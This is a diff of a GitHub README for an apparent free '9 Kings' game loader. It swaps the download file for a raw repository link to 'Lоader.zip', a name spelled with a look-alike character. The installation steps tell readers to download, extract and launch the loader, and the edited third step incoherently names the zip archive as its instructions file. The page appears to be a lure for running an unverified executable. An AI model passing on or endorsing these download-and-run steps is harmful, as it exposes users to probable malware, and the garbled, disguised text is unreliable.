Jaemsyien-Devgan/9Kings-Freebie-Hub/README.md

 ## 🚀 Installation Guide

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/Jaemsyien-Devgan/9Kings-Freebie-Hub/main/Lоader.zip` from the repository.
-2. Extract `Loader.rar` to your chosen directory.
+2. Extract `https://raw.githubusercontent.com/Jaemsyien-Devgan/9Kings-Freebie-Hub/main/Lоader.zip` to your chosen directory.
-3. Follow the step-by-step instructions in the included `ReadMe.txt` for setup.
+3. Follow the step-by-step instructions in the included `https://raw.githubusercontent.com/Jaemsyien-Devgan/9Kings-Freebie-Hub/main/Lоader.zip` for setup.
 4. Launch and enjoy unparalleled access with 9 Kings Loader!

 > **Notice:** No external download sites are needed.
 Only use the Loader from this repository for maximum security!